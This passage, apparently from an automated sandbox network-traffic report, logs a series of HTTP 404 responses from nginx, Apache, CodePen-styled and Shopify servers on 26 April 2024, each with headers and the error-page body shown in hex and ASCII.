Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 08:06:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:07:09 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:07:12 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:07:15 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:07:17 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Apr 2024 08:07:55 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-26T08:08:00.3240832Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Apr 2024 08:07:58 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-04-26T08:08:00.3240832Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Apr 2024 08:08:00 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-26T08:08:05.9520127Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Apr 2024 08:08:03 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-26T08:08:08.6951174Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:32 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:34 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:37 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:40 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:46 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:08:55 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:09:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: 15e5395e-3d66-4581-b044-b646659ada2c-1714118940server-timing: processing;dur=9content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15e5395e-3d66-4581-b044-b646659ada2c-1714118940x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15e5395e-3d66-4581-b044-b646659ada2c-1714118940x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtXFLi0seRduO9M09Pycy5P3cnsxIqMxSSK%2BdoS4yyWR7J9%2FoR%2B3wtqTjEphu%2BXGDf8mLaFtpli7%2FSuCOxkZk43TKvc2wnhfendgRTw0ICMqz%2FW3V2wp1%2BcsJ25qBk9uKlHWIPy7PNep"}],"group":"cf-nel",Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:09:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: 2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943server-timing: processing;dur=10content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2abd999f-56ef-41bf-803e-7d2177fc8dc9-1714118943x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1Content-Encoding: 